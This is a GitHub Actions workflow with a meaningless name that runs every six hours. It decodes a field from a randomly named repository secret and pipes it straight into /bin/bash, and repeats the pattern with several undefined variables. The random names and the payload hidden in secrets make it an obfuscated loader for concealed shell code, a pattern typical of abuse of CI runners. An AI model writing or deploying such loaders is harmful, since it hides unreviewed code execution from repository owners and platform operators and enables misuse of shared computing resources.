name: eveningmakeup
on:
  workflow_dispatch:
  schedule:
    - cron: '47 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: eveningmakeup
        env:
          vwca366: ${{ secrets.vwca366 }}
        run: |
          echo $vwca366 | jq -r .awxxg8 | /bin/bash
          echo $jwcz1 | jq -r .mhw98446 | /bin/bash
          echo $pbok581 | jq -r .ldfko08 | /bin/bash
          echo $lxi1624 | jq -r .dwxaj0916 | /bin/bash
          echo $os5666 | jq -r .zbez407 | /bin/bash

